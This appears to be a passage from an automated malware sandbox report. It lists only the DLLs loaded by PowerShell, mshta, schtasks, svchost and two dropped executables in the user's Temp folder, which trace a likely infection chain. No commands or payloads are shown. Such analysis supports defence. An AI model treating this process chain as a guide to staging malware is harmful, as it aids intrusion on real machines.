                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: dui70.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: duser.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: chartv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: atlthunk.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
